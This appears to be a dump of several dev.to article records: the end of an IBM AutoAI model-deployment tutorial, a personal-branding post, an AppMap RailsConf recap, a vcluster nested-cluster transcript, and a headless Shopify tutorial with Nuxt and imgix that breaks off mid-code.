####Use the Data Join Table to Build the Schema

Set up the nodes to match the following image to make connecting the nodes easier.

Drag from the node on one end of the **User_experience.csv** box to the node on the end of **Call_log.csv**.

In the panel for configuring the join, click **(+)** to add the suggested keys **Agent_ID** and **Call_Date** as the join keys.

Repeat the data join process until you have joined all the data tables.


####The Completed Data Join Schema Should Look Like This:

Choose **User_Experience** as the column to predict.

AutoAI analyzes your data and determines that the User_Experience column contains information making the data suitable for a **Multiclass Classification** model. The default metric for a **Multiclass Classification** model is optimized for **Accuracy & run time** automatically by AutoAI.
**Note**:
* Based on analyzing a subset of the data set, AutoAI chooses a default model type: binary classification, multiclass classification, or regression. Binary is selected if the target column has two possible values, multiclass if it has a discrete set of 3 or more values, and regression if the target column is a continuous numeric variable. You can override this selection.
* AutoAI chooses a default metric for optimizing. For example, the default metric for a binary classification model is Accuracy.
* By default, ten percent of the training data is held out to test the performance of the model.
###3. Run the AutoAI Experiment



###4. Explore the Holdout & Training Data Insights
Pipeline Comparison

Explore the Leading Pipeline

Model Evaluation

Threshold Chart

Feature Importance

From the feature importance chart, the most important feature is count **(*Call_Type_Description*)**, which is the total number of calls in a day.
Other important features come from **After_Call_Work_Time**, such as talk time and queue time. These features affect users' experience the most.
**The call center management team should pay attention to these features and try to figure out how to improve user’s experience by adjusting these features.**
###5. Deploy the Trained Model
####Click **Save as** and Select **Model**

####Click **Create**

####Click **View in project**

####Add the Call Center Datasets to the Deployment Space
Navigate to the **Deployment Space**

Click **browse for files to upload**

Select Call Center Data Sources


####Promote the Trained Model to the Deployment Space
Click **Promote to deployment space**

Select the Deployment Space from the dropdown menu.

Check the **Go to the model in the space after promoting it** box.

Click **Promote**
####Deploy the Trained Model
Click **Create deployment**

####Create a New Batch Deployment
Add a name for the new Batch deployment.

####Configure the Hardware Definition
Select the **Data Join** hardware.

Select the **Model Scoring** hardware.

Click **Create**


###6. Score the Model
To score the model, you create a batch job that will pass new data to the model for processing, then output the predictions to a file. **Note**: For this tutorial, you will submit the training files as the scoring files as a way to demonstrate the process and view results.
####Create a New Batch Job
Click **Create Job**

Add a name for the new Batch job. Click **Next**

Keep the current **Hardware configuration**. Click **Next**

Keep the **Schedule off**. Click **Next**

####Add the Scoring Files
You will see the training files listed. For each training file, click the **Select data source** button, and choose the corresponding scoring file.

**WARNING**: Schema mismatch. The column types in this data asset do not match the column types in the Model Schema. Click **Continue** to select anyway.

Add **call-predictions.csv** as the Output file name.

####Run the Batch Job
Click **Create**


####View the Batch Job

####Wait for the Batch Job to Complete
Starting...

Running...

Completed

###7. View the Prediction Results
Download **call-predictions.csv**, and view the prediction results in Excel.

#CONGRATULATIONS!

###You've completed Think Lab 2124: Build & Deploy AI/ML Models w Multiple Datasets w AutoAI!
Tune in next week for our next Tutorial Tuesday post.
Follow for more Cloud Native & Watson AI/ML content:
https://linktr.ee/jritten | jritten | |
708,273 | Things you should know about personal branding. | When you Google your name, what comes up? Hello 👋, my gorgeous friends on the internet, today... | 0 | 2021-05-25T15:24:44 | https://dev.to/unclebigbay/things-you-should-know-about-personal-branding-2g2a |
When you Google your name, what comes up?

<hr />

Hello 👋, my gorgeous friends on the internet. Today I will be sharing some tips I am following to build my personal brand, which I feel can come in handy when building your own personal brand too. This article also contains reasons you should have a personal brand in the first place.
>
Do you know that your name is the greatest asset that you have, and that turning it into a brand people can trust can help you build very good relationships with other people and also a very successful business?
Before we proceed, let me share with you some things I have been doing wrong in the past that have secretly affected the process of building my personal brand without my being aware of it, and how I have made amendments to them.
Below are a few things **I HAVE BEEN DOING WRONG** and how I have corrected them:
### 1. DIFFERENT PUBLIC NAMES

Honestly, I just realized lately that my Twitter username is totally different from my LinkedIn username and other social media profiles, which can sometimes make it difficult for someone trying to reach out to find me with just a single username.
<hr />
**Correction**: After realizing this, I tried as much as possible to make all my usernames and display names similar across all my social media accounts.
<hr />
I chose **unclebigbay** for all my social media profiles, because it is not as common as my full name **Ayodele Samuel Adebayo**, and when people get to know me more as **unclebigbay**, I can be easily located on the internet. 😉
<hr />
>
Your blog name can also be your brand, you can proceed to search your popular name on Google to see where you fall on the search result.
### 2. DIFFERENT PROFILE PICTURES

Do you know that 7 out of 10 people who are interested in your content will have your profile picture stuck in their memory? This makes it easier for them to recognize any of your social media accounts, given that you have the same profile picture across all of them.
<hr />
**Correction**: I took what is called a professional picture, which I will be using for all my social media profiles till my next birthday 😎. **Check out my Hashnode [profile](https://hashnode.com/@unclebigbay)**
<hr />
>
I guess you already know how hard it gets with 3 social media accounts with 3 different display names and images. I was guilty of that too. Your personal brand picture might just be an artwork or a cat image. 😉
<hr />
@[Victoria Lo](@victoria) doesn't use her real picture but always stays consistent with the avatar and the cover image across all her social media accounts that I know.

@[Syed Fazle Rahman](@fazlerocks) uses his real picture and stays consistent with it across all his social media accounts that I know.

<hr />
I hope you found that helpful 👇, now, let's proceed to the benefits of having a personal brand.
<hr />
#### 1. IT HELPS YOU FIGURE OUT THE "WHY"

The very first thing you would like to pinpoint when you're branding your name is the value you have to offer under that name. This can range from <span class="rock">Reliability</span>, <span class="rock">Creativity</span>, and <span class="rock">Honesty</span> to <span class="rock">Service to others</span>. This is your passion, what you love so much that it drives you to do what you do.
>
This will help you answer the **Why** you're into what you're doing.
#### 2. IT MAKES YOU STAND OUT

Creating your personal brand will not only make you figure out your value but will also make you stand out from the pack, and as long as you are providing value to others, you will be known especially for your uniqueness.
#### 3. IT HELPS BUILD YOUR ONLINE PRESENCE

The number of people who trust and follow your brand will gradually increase as you continue to be consistent with the value that you provide through your personal brand. These people will turn your brand into a position of influence, since they trust and gain from the value you are giving out.
>
you can begin to earn from your brand by advertising products from companies to your audience, and more.
#### 4. SOMEONE IS WATCHING

Having your own personal brand and keeping everything consistent will make people think you're organized and that you know what you are really doing. This will make them keep a close watch on your brand space, and before you know it, you have gained your next client's trust without even pitching what you do.
>
Your brand has done that 😉
#### 5. IT HELPS ATTRACT OPPORTUNITIES

When you have your own personal brand and you keep the value coming on a consistent basis, you will have a high chance of getting opportunities like:
1. Recommendations
2. Project Collaborations
3. Consultancy
4. Job Interviews
5. Invite as a speaker
6. Mentorships
7. Sponsorship
8. Partnership etc.
**Depending on what you have to offer.**
### How can you Get Started?

Now that you are aware of the benefits of having your own personal brand, I have also come up with things you can start with when you are ready to create your own personal brand 😃.
1. Know your **audience** and **values**
2. Decide what you want to be **known** for
3. Pick a **unique** name and theme for your brand
4. Be **consistent** with your style (writing, posts, colors, images)
5. Make sure you're **easy** to find (no multiple names)
6. Research More on **Networking**
7. Stay **Updated** in your field
8. Grow your **Online presence**
9. Ask for **recommendation**
10. **Live** your brand

And that is a wrap for the tips and benefits of having your personal brand. I hope you enjoyed reading this article and have learned one or two things from it. If you would like to connect with me, kindly check out my [Link-Tree](https://linktr.ee/unclebigbay) 😍 I will be happy to know you.

If you enjoyed reading this article, there is a chance you would also enjoy reading about my Birthday Portfolio Present, which is one of the steps of building my own brand. You can check it out [HERE](https://unclebigbay.hashnode.dev/hey-its-my-birthday-today-let-me-walk-you-through-my-birthday-portfolio-gift-1)
Thanks and see you in the next one 🏃♂️🏃♂️🏃♂️🏃♂️.
| unclebigbay | |
708,289 | How to auto-document the end-to-end code and data flows of your Rails app | In case you missed it, I’m recapping my recent RailsConf 2021 talk in a series of four, short blog... | 12,899 | 2021-05-27T11:19:04 | https://dev.to/appmap/how-to-auto-document-end-to-end-flows-with-appmap-41d2 | rails, techtalks | In case you missed it, I’m recapping my recent [RailsConf 2021](https://www.railsconf.org/) talk in a series of four, short blog posts. Check out [Part 1 - We need a better way to communicate and explain our code decisions](https://dev.to/appland/we-need-a-better-way-to-communicate-and-explain-our-code-decisions-1nic).
This post recaps the first of the demos I gave as part of my talk. **Using [AppMap](https://appland.com/products/appmap), I walked RailsConf attendees through how to automatically generate documentation and visualizations for end-to-end flows -- right in your code editor.**
End-to-end flows help us as developers get the right context. They help us figure out how a given web request uses particular database tables, for example, and they help us find important functions performed by code, such as authentication, authorization, and emailing.
**AppMap offers both high-level and low-level views of end-to-end code and data flows.** AppMap behaves like a Google Map, providing interactive navigation of the code. You can write analysis code on the AppMap data, and dive into source code and debuggers for further details.
For Ruby, first install the [AppMap extension for VSCode](https://appland.com/docs/quickstart/vscode/step-1.html) or the [AppMap plugin for RubyMine](https://appland.com/docs/quickstart/rubymine/step-1.html). Then install the AppMap gem into your Ruby app and configure which source files and dependency gems you want to record. Finally, record AppMap files by recording your code - either using [app remote recording](https://appland.com/docs/reference/appmap-ruby#remote-recording), or by running test cases. **Unlike static analysis, which only looks at your files on disk, AppMap records your code while it’s running -- meaning it knows exactly what happened at every point and how all the code, services and data stores fit together.**
You can watch this portion of my RailsConf talk in the video clip above, which includes a live tour of AppMap using the Rails Sample App. If you want to follow along in the code or look it up later, I’ve created a fork of the Rails Sample App sixth edition. Within that fork is [a branch called eager loading](http://github.com/land-of-apps/sample_app_6th_ed/tree/eager-loading). Let us know what you think in the [AppMap Discord](https://discord.com/invite/N9VUap6)! Your feedback is really important to us.
**Coming up next:** In Parts 3 and 4 of this blog series, I’m going to recap the remaining demos of my RailsConf talk. Using tools that automatically generate documentation and visualizations of architecture and code design, I’ll be documenting web services and data model details.
| kgilpin |
708,313 | vluster Inception Video | Video showing how to create virtual clusters in Kubernetes with vcluster | 0 | 2021-05-25T17:07:04 | https://dev.to/loft/vluster-inception-video-3886 | kubernetes | ---
title: vcluster Inception Video
published: true
description: "Video showing how to create virtual clusters in Kubernetes with vcluster"
tags: Kubernetes
//cover_image: https://direct_url_to_image.jpg
---
Running a virtual cluster inside a Kubernetes cluster is cool, but running a virtual cluster inside a virtual cluster is some real inception. Watch this YouTube video to see how you can do this with our open source virtual cluster tool called [vcluster](https://vcluster.com), or read the transcript below if you prefer.
{% youtube KFbAzoUzFO8 %}
## Transcript
Hi, I'm Rich with Loft Labs. Recently, I [did a video](https://youtu.be/J7OQic9M-9w) introducing our open source virtual cluster tool for Kubernetes called vcluster, which lets you run a virtual cluster entirely within a namespace of your host cluster. During the video, I mentioned that you can actually run a vcluster inside of a vcluster, and I thought I'd show you how this vcluster inception works. Let's get to a shell and have a look.
Here's level one, my host cluster. First I'll start up an Nginx deployment with a single pod in the host cluster.
```Bash
$ kubectl create deployment nginx-deployment -n default --image=nginx --replicas=1
deployment.apps/nginx-deployment created
```
Okay. We now have a single Nginx pod running. Now let's drop down to level two and create our first vcluster.
```Bash
$ vcluster create vc-level-2 -n level2
[info] Creating namespace level2
[info] execute command: helm upgrade vc-level-2 vcluster --repo https://charts.loft.sh --kubeconfig /var/folders/gy/d3_c4t1x731_hl8qtrfkhr_h0000gn/T/525221466 --namespace level2 --install --repository-config='' --values /var/folders/gy/d3_c4t1x731_hl8qtrfkhr_h0000gn/T/595064305
[done] √ Successfully created virtual cluster vc-level-2 in namespace level2. Use 'vcluster connect vc-level-2 --namespace level2' to access the virtual cluster
```
vclusters are deployed using Helm. Our vcluster is running in a namespace on the host cluster called level2.
```Bash
$ kubectl get pods -n level2
NAME READY STATUS RESTARTS AGE
vc-level-2-0 0/2 Pending 0 2s
```
In that namespace you can see the vcluster pod running. vcluster uses k3s under the hood, so there's a full-blown API server running in that pod. Let's connect to the vcluster.
```Bash
$ vcluster connect vc-level-2 -n level2
[info] Waiting for vCluster to come up...
[done] √ Virtual cluster kube config written to: ./kubeconfig.yaml. You can access the cluster via `kubectl --kubeconfig ./kubeconfig.yaml get namespaces`
[info] Starting port forwarding: kubectl port-forward --namespace level2 vc-level-2-0 8443:8443
Forwarding from 127.0.0.1:8443 -> 8443
Forwarding from [::1]:8443 -> 8443
```
vcluster connect sets up port forwarding. We'll leave that running and open a new shell.
vcluster connect also creates a kubeconfig file that points at the virtual cluster. Let's point our local kubectl at that kubeconfig.
```Bash
$ export KUBECONFIG=./kubeconfig.yaml
```
And then look at the namespaces.
```Bash
$ kubectl get namespaces
NAME STATUS AGE
default Active 15m
kube-system Active 15m
kube-public Active 15m
kube-node-lease Active 15m
$ kubectl get pods
No resources found in default namespace.
```
We don't see the level2 namespace that was created in the host cluster. Our virtual cluster is running entirely inside of that namespace. We don't see the Nginx deployment that's running in the host cluster either. Let's create an Nginx deployment with two replicas here at level2.
```Bash
$ kubectl create deployment nginx-deployment -n default --image=nginx --replicas=2
deployment.apps/nginx-deployment created
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx-deployment-84cd76b964-kp4w6 0/1 ContainerCreating 0 1s
nginx-deployment-84cd76b964-78wnp 0/1 ContainerCreating 0 1s
```
Okay. Now for the real inception action. Let's create a vcluster inside of our vcluster.
```Bash
$ vcluster create vc-level-3 -n level3
[info] Creating namespace level3
[info] execute command: helm upgrade vc-level-3 vcluster --repo https://charts.loft.sh --kubeconfig /var/folders/gy/d3_c4t1x731_hl8qtrfkhr_h0000gn/T/088217689 --namespace level3 --install --repository-config='' --values /var/folders/gy/d3_c4t1x731_hl8qtrfkhr_h0000gn/T/968839140
[done] √ Successfully created virtual cluster vc-level-3 in namespace level3. Use 'vcluster connect vc-level-3 --namespace level3' to access the virtual cluster
```
And then connect to it. We have to use the level2 kubeconfig and specify a different local port for port forwarding.
```Bash
$ vcluster connect vc-level-3 -n level3 --local-port=8444
[info] Waiting for vCluster to come up...
[done] √ Virtual cluster kube config written to: ./kubeconfig.yaml. You can access the cluster via `kubectl --kubeconfig ./kubeconfig.yaml get namespaces`
[info] Starting port forwarding: kubectl port-forward --namespace level3 vc-level-3-0 8444:8443
Forwarding from 127.0.0.1:8444 -> 8443
Forwarding from [::1]:8444 -> 8443
```
We'll open one more tab for level three and use its kubeconfig. Let's make an Nginx deployment here with three replicas.
```Bash
$ export KUBECONFIG=./kubeconfig.yaml
$ kubectl create deployment nginx-deployment -n default --image=nginx --replicas=3
deployment.apps/nginx-deployment created
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx-deployment-84cd76b964-czlpz 0/1 ContainerCreating 0 3s
nginx-deployment-84cd76b964-l292w 0/1 ContainerCreating 0 3s
nginx-deployment-84cd76b964-ph79t 0/1 ContainerCreating 0 3s
```
And we only see the three Nginx pods. Let's take a look at our host cluster again. We'll switch to that kubeconfig.
```Bash
$ export KUBECONFIG=~/.kube/config
$ kubectl get pods --all-namespaces
NAMESPACE NAME READY STATUS RESTARTS AGE
default nginx-deployment-84cd76b964-64tbh 1/1 Running 0 24m
kube-system coredns-f9fd979d6-mlctd 1/1 Running 0 77m
kube-system coredns-f9fd979d6-pgnh8 1/1 Running 0 77m
kube-system etcd-docker-desktop 1/1 Running 0 76m
kube-system kube-apiserver-docker-desktop 1/1 Running 0 76m
kube-system kube-controller-manager-docker-desktop 1/1 Running 0 76m
kube-system kube-proxy-j42rb 1/1 Running 0 77m
kube-system kube-scheduler-docker-desktop 1/1 Running 0 76m
kube-system storage-provisioner 1/1 Running 0 77m
kube-system vpnkit-controller 1/1 Running 0 77m
level2 coredns-66c464876b-bg95z-x-kube-system-x-vc-level-3--e33a70f289 1/1 Running 0 8m56s
level2 coredns-66c464876b-gl66g-x-kube-system-x-vc-level-2 1/1 Running 0 24m
level2 nginx-deployment-84cd76b964-78wnp-x-default-x-vc-level-2 1/1 Running 0 9m17s
level2 nginx-deployment-84cd76b964-czlpz-x-default-x-vc-lev-af1154c6f7 1/1 Running 0 9s
level2 nginx-deployment-84cd76b964-kp4w6-x-default-x-vc-level-2 1/1 Running 0 9m17s
level2 nginx-deployment-84cd76b964-l292w-x-default-x-vc-lev-91ce9ee9e0 1/1 Running 0 9s
level2 nginx-deployment-84cd76b964-ph79t-x-default-x-vc-lev-5cdee9fab0 1/1 Running 0 9s
level2 vc-level-2-0 2/2 Running 0 24m
level2 vc-level-3-0-x-level3-x-vc-level-2 2/2 Running 0 9m9s
```
Here we see the Nginx deployment from our host cluster and the two virtual clusters. How does this all work? Each vcluster has an API server inside of it, but it doesn't have a scheduler. So the pods are synced to the host cluster and run there.
And that's a quick look at vcluster inception. You might not have a use case for running nested vclusters, but maybe you do. You could assign each developer at your company a namespace with a vcluster running, and allow them to create additional vclusters inside of it. Either way, it's great to know that to the person using a virtual cluster, it looks like a real Kubernetes cluster.
To learn more about vcluster go to [vcluster.com](https://vcluster.com) or have a look at the code at [github.com/loft-sh/vcluster](https://github.com/loft-sh/vcluster). | richburroughs |
708,352 | Headless Shopify with Nuxt, Tailwind, imgix, & Vercel | Shopify does a lot of items well, but one area that can be improved is overall website performance. I'm diving into easily using Shopify's Storefront Access Token in an API with Nuxt as the front-end and boosting frontend scores. | 0 | 2021-05-26T00:30:20 | https://dev.to/daletom/headless-shopify-with-nuxt-tailwind-imgix-vercel-1ldg | nuxt, webdev, headless, ecommerce | ---
title: Headless Shopify with Nuxt, Tailwind, imgix, & Vercel
published: true
description: Shopify does a lot of items well, but one area that can be improved is overall website performance. I'm diving into easily using Shopify's Storefront Access Token in an API with Nuxt as the front-end and boosting frontend scores.
tags: nuxtjs, webdevelopment, headless, ecommerce
//cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/prj32osd8neeq16jj13v.png
---
People have started to realize that their tried and true traditional eCommerce platforms are falling behind when it comes to performance. I wanted to take a look at a particularly popular eCommerce tool with a lower cost barrier, Shopify. Shopify does a lot of things well. Shopify can be a simple tool to manage your products, from prices to images to inventory. It also does a good job with the checkout process. It has always offered website templates to easily deploy your site on a Shopify front end. It reminds me of a simpler setup than even using a Wordpress template. But when you deploy your eCommerce website using Shopify, you are often sacrificing performance for ease of use. It turns out that Shopify has made it quite easy to access the functionality of your Shopify account using an API. I am going to show an easy method to utilize Shopify's Storefront Access Token in an API with Nuxt.js as the front end. I will also boost performance scores using imgix for the images and Vercel to host the site.
### Goals For What We Are Building
My goal for this demo is to quickly create a working headless eCommerce website using Shopify. In the end we will have a simple page displaying three products, with their names and descriptions, all coming from the Shopify API. We will be accessing the Shopify API via the nuxt-shopify SDK, which is essentially a GraphQL API. This way you can request information specific to a product or category, without having to request all info via the API on every page request. This will be set up in Nuxt as the front-end, but will be displayed via Vercel using SSR. This allows end users to modify/add/remove products all in the Shopify UI and have those changes be immediately reflected on the website without having to push or deploy any changes via a webhook. Here is a link if you would like to jump ahead to the [Github](https://github.com/daletom/headless-shopify-test01). If you would prefer to follow along in a video, here is the demo on Youtube:
{% youtube vI_JpzCTUX8 %}
## Install Items
Run the following command to start a nuxt project:
```
npm init nuxt-app "projectname"
```
This will provide you a list of prompts to fill out in your terminal to create your project. I am using JavaScript, your package manager of choice, Tailwind CSS as my UI framework, none of the additional modules, the linter of your choice, no testing framework, Universal rendering mode, and Static hosting. The final two are important; the rest you can change or modify as you wish.
We will also need to install two other packages: the nuxt-shopify SDK and the vue-imgix SDK. I will cover both in more detail below as we utilize them. First, the nuxt-shopify SDK:
```
npm install nuxt-shopify
```
Then the vue-imgix SDK
```
npm install vue-imgix
```
## Sign up for Shopify and get Storefront Access Token
Next you will need to create a Shopify account. They do offer a free trial for __ days to build and test your Shopify account. Go to Shopify's Sign Up page to create your account now if you don't have one.
After you have completed signing up or logging in to your existing account, we will need to get a Storefront Access Token. A lot of examples on the internet made this seem difficult, but it's actually quite easy. You just need to create a new developer app by clicking Apps on the left menu, then clicking a hard-to-see link called Manage private apps. Here is a screenshot of where it is:

Fill out the form; for the Storefront API Permissions you will want to check off all of these.

Once this is completed, you can scroll down and see a field called Storefront Access Token. It's important to use this token, not the Shopify API token. Now go to the Nuxt project that you created. Create a .env file in the base of your project. I went ahead and added variables for my store's Shopify url and the storefront token. Your .env file will look like this:
```
SHOPIFY_DOMAIN="letsgoheadless.myshopify.com"
SHOPIFY_ACCESS_TOKEN="1234"
```
Now we will want to update the nuxt.config file to finalize the connection to your Shopify account. In the modules section of your nuxt.config, you will want to add nuxt-shopify:
```
modules: ['nuxt-shopify'],
```
Then you will want to add a section called shopify. You will add the process.env for your domain and storefront token here. Also set `unoptimized` to `true`.
```js
shopify: {
  domain: process.env.SHOPIFY_DOMAIN,
  storefrontAccessToken: process.env.SHOPIFY_ACCESS_TOKEN,
  unoptimized: true
},
```
You will now have access to items in your Shopify Account. If you created a new Shopify account during this demo, you will then need to add a couple products to your account so we have something to look at. If you want to see an example of me adding products, you can refer back to the video link above, at minute 13:58. If you already have an account, we can move forward from here.
## Displaying Data from Shopify
Now that we have correctly connected to Shopify using our Storefront Access Token and we have added a few products to our Shopify account, let's at least prove that we can display JSON results from an API call. Let's go to our index.vue page, which is our home page. I'm going to add a fetch request using the nuxt-shopify SDK in the `<script>` portion at the bottom of our index.vue page. I am adding this:
```js
export default {
  async asyncData({ $shopify, params }) {
    const products = await $shopify.product.fetchAll();
    return { products };
  }
}
```
I got this fetchAll request from the [nuxt-shopify sdk page](https://nuxt-shopify-docs.vercel.app/). You can see there are a lot of examples of the various requests you can make there. Now, I want to create a `<ul>` list and display the JSON data. In this list, I need to be sure to use a v-for and a key to iterate over the fetched products. Since I returned the fetchAll result as products, I will loop over that. Here is what I am adding:
```html
<ul class="mt-4 text-center">Shopify JSON response
  <li v-for="product in products" :key="product.id">
    {{product}}
  </li>
</ul>
```
In the v-for, I renamed the products to product and I am using the id value as a key to bind them. So theoretically if I simply put product inside of double curly brackets, it will display the entire JSON result of all of the products I am fetching from Shopify. If you run `npm run dev` in your console now, you should see the JSON response. This is an example of what a portion of mine looks like:
```
{ "id": "Z2lkOi8vc2hvcGlmeS9Qcm9kdWN0LzY3ODcxMjE1NzgxNTA=", "availableForSale": true, "createdAt": "2021-05-21T18:06:37Z", "updatedAt": "2021-05-21T19:45:51Z", "descriptionHtml": "Blue Hoodie everyone will need to have", "description": "Blue Hoodie everyone will need to have", "handle": "blue-hoodie", "productType": "", "title": "Blue Hoodie", "vendor": "letsgoheadless", "publishedAt": "2021-05-21T18:07:04Z", "onlineStoreUrl": null, "options": [ { "id": "Z2lkOi8vc2hvcGlmeS9Qcm9kdWN0T3B0aW9uLzg3NTc3OTk2MTY2Nzg=", "name": "Title", "values": [ { "value": "Default Title", "type": { "name": "String", "kind": "SCALAR" } } ], "refetchQuery": {}, "type": { "name": "ProductOption", "kind": "OBJECT", "fieldBaseTypes": { "id": "ID", "name": "String", "values": "String" }, "implementsNode": true } } ], "images": [ { "id": "Z2lkOi8vc2hvcGlmeS9Qcm9kdWN0SW1hZ2UvMjkxMjMxMzM2MzY3NzQ=", "src": "https://cdn.shopify.com/s/files/1/0568/1833/5910/products/ix_blue_hoodie.png?v=1621620398", "altText": null,
```
You will notice that you will see the name, description, images, and any other data you have entered. If you entered multiple images for each product, there will be multiple images in the images section. Since there may be multiple images in the future, I would like to focus on calling the first image, which is the primary image for the product. I would also like to see the src url for each image. In order to do that, I am going to modify the product I had entered to view the first image, which is accessed with the index 0, followed by src. So here is the updated list:
```html
<ul class="mt-4 text-center">Shopify JSON response
  <li v-for="product in products" :key="product.id">
    {{product.images[0].src}}
  </li>
</ul>
```
This should now display the Shopify url for each of these images in a list. That's great, we can now easily call the image urls of the Shopify images! If you remember, I did say I was using Tailwind CSS with my Nuxt project when we initialized it. So if you aren't familiar with Tailwind, the items I put in the class of an element is the style I am adding. So the `mt-4 text-center` I added in the list class, is a margin of 4 and centering the text. I'm not going to explain much more about the Tailwind elements I am using, but certainly welcome you to check out more about Tailwind if you don't feel that you are great at css, because Tailwind makes it so much easier.
## Outlining Our Product Component
Now that we know how to get specific data about each of our products, let's create a simple product component and display them. I am going to create a `ProductWidget.vue` in the components folder in our nuxt project. Then I'm going to create a couple of divs to display the image, title, and description of each product:
```html
<div class="rounded-t-lg bg-grey pt-2 pb-2">
  <img :src="product.images[0].src"
    class="crop mx-auto"
    width="380"
    height="380"
    loading="lazy"
  />
</div>
<div class="pl-4 pr-4 pb-4 pt-4 rounded-lg">
  <h4 class="mt-1 font-semibold text-base leading-tight truncate text-gray-700">
    {{product.title}}
  </h4>
  <div class="mt-1 text-sm text-gray-700">{{product.description}}</div>
</div>
```
You can see I used the same product.images[0].src for the img src, but remember to add a `:` to src, so it will bind correctly. For the title and description, they are just simply product.title or description. I am also going to update the script at the bottom of this component in order to identify product in the props and provide a name for the component to call on the index.vue page:
```js
export default {
  name: 'productWidget',
  props: {
    product: {
      type: Object,
      default: null
    }
  }
}
```
Now in order to make this component work on the index.vue page, we are going to need to import the component and register it. I have updated my script like this:
```html
<script>
import ProductWidget from '~/components/ProductWidget.vue'

export default {
  name: "IndexPage",
  components: {
    ProductWidget
  },
```
I am now going to add a div above my Shopify Json response list that will contain the component. I need to add the v-for and :key again like we did earlier for this div. I am also going to add a v-bind to allow me to use the product inside of the component. Here is what I did:
```html
<template>
  <div>
    <div class="m-6 grid grid-cols-1 2col:grid-cols-2 3col:grid-cols-3 gap-4">
      <div v-for="product in products" :key="product.id" v-bind:product="product" class="border rounded-lg bg-gray-100 hover:shadow-lg">
        <productWidget :product="product"></productWidget>
      </div>
    </div>
```
Maybe you noticed the div I added with all of the tailwind css references in the class. That is how I will be using a grid with Tailwind. One unique item I did here was to actually customize my Tailwind setup, choosing at certain breakpoints whether to have 1, 2, or 3 columns. If you are wanting to up your Tailwind game, this is how I adjusted those sizes and created the custom 2col and 3col names. I created a tailwind.config.js file and added this:
```js
module.exports = {
  theme: {
    screens: {
      '2col': '850px',
      '3col': '1290px',
    },
  }
}
```
Ok, now if you refresh your localhost again in the browser, you should be seeing several products.
## Optimizing the images
Now that you are looking at your products, you might have noticed the images aren't really optimized, and maybe they look a little odd next to each other because they all have different aspect ratios. I am going to address that by using imgix to optimize these images. Just to confirm, I have been working at imgix since 2015, so I do like using imgix for my projects. You can certainly use another optimization service as well. This isn't a post sponsored by imgix, I just happen to be someone that works at imgix that is writing this post at night on my own time.
Now that we got that out of the way :), I need to essentially CNAME my Shopify image urls to my imgix account. I can do that by creating a web folder source and pointing it to the Shopify urls of my images. These are what my images look like:
```
https://cdn.shopify.com/s/files/1/0568/1833/5910/products/ix_blue_hoodie.png?v=1621620398
https://cdn.shopify.com/s/files/1/0568/1833/5910/products/ix_holo_sticker.jpg?v=1621620474
https://cdn.shopify.com/s/files/1/0568/1833/5910/products/ix_gamer_jersey.png?v=1621620521
```
All of the product image urls are the same up to the point after the account id and products. So if I cname up to that portion, I can replace it with my imgix url and start optimizing those images.

Now those urls could be this instead:
```
https://headless-shopify.imgix.net/ix_blue_hoodie.png
https://headless-shopify.imgix.net/ix_holo_sticker.jpg
https://headless-shopify.imgix.net/ix_gamer_jersey.png
```
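The prefix swap described above can be sketched in a few lines of JavaScript. This is just an illustration of the mapping that the web folder source performs, not code the site needs; the two prefix constants below are the ones from this demo, so swap in your own:

```javascript
// Illustration only: how the web folder source maps Shopify CDN urls
// onto the imgix domain. Replace these prefixes with your own values.
const SHOPIFY_PREFIX = "https://cdn.shopify.com/s/files/1/0568/1833/5910/products/";
const IMGIX_PREFIX = "https://headless-shopify.imgix.net/";

function toImgix(shopifyUrl) {
  // drop the ?v=... cache-busting query string, then swap the prefix
  const withoutQuery = shopifyUrl.split("?")[0];
  return withoutQuery.replace(SHOPIFY_PREFIX, IMGIX_PREFIX);
}

console.log(toImgix("https://cdn.shopify.com/s/files/1/0568/1833/5910/products/ix_blue_hoodie.png?v=1621620398"));
// → https://headless-shopify.imgix.net/ix_blue_hoodie.png
```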
In order to programmatically change these urls and add responsive design and optimization, I can use the vue-imgix SDK we installed in the beginning. Since this is more of a native Vue SDK, we will need to create a file in the plugins folder to make it work with Nuxt. I am calling this file vue-imgix.js; this is what I put in it:
```js
import Vue from 'vue';
import VueImgix from 'vue-imgix';

Vue.use(VueImgix, {
  domain: "headless-shopify.imgix.net",
  defaultIxParams: {
    auto: 'format,compress'
  },
});
```
Choose whatever domain you are using. I am also using auto format,compress as my default, which will just apply some smart formatting and compression. If the compression is too much for your nicer ecomm images, just remove the compress. The format will not hurt your image quality, so definitely always use that at least. Now just register the plugin in the nuxt.config file like this:
```
plugins: ['~/plugins/vue-imgix.js'],
```
Now we can go back to our ProductWidget component and adjust the img tag. You can update this to an ix-img tag, which will start using the vue-imgix SDK. I am going to keep the images at a fixed size of 380, but add in multiple sizes for each device resolution. I am also going to add some imgix parameters that will try to fit everything to the same size without cropping, filling in any extra space with a color the same as the background. Also, I am trimming away any extra space around the image, again, without cropping a part of the product. Here is what my img tag now looks like:
```html
<ix-img :src="product.images[0].src"
  class="crop mx-auto"
  width="380"
  height="380"
  :imgixParams="{fit:'fill', fill:'solid', fillcolor:'f7fafc', trim:'auto'}"
  loading="lazy"
  fixed
/>
```
If you try to look at the images now, they will be broken. That is because the src is still calling the Shopify image url, but I am also adding my imgix domain in front of the entire Shopify image url. I need to remove the characters from that url that I identified in my web folder source. I also want to remove the ?v= query string at the end of the url. In order to do that, I am going to create a method called imageSrc. Then I will just use a slice to remove the beginning and ending characters of the Shopify url that we are receiving. So if I slice the first 57 characters, and slice the last 13 characters, that will get me just the file name ix_blue_hoodie.png. However many characters you need to slice, you should do the same on your end. Here is the method I built in the ProductWidget component:
```js
methods: {
  imageSrc() {
    return this.product.images[0].src.slice(57, -13)
  }
}
```
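Counting characters works here, but it silently breaks if the account id or folder depth in your urls is different. As an alternative sketch (not the article's code), the file name can be pulled out with standard URL parsing, which also drops the ?v= query string for free:

```javascript
// Hypothetical, more robust version of imageSrc: parse the url and keep
// only the last path segment instead of slicing fixed character counts.
function imageName(src) {
  const url = new URL(src);
  // pathname excludes the query string, so ?v=... is gone automatically
  return url.pathname.split("/").pop();
}

console.log(imageName("https://cdn.shopify.com/s/files/1/0568/1833/5910/products/ix_blue_hoodie.png?v=1621620398"));
// → ix_blue_hoodie.png
```

Note this returns the bare file name without a leading slash; depending on how your imgix setup joins domain and path, you may need to prepend one.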
Now instead of the product.images[0].src, I can call imageSrc() in the src of the img tag. Here is the final img tag:
```html
<ix-img :src="imageSrc()"
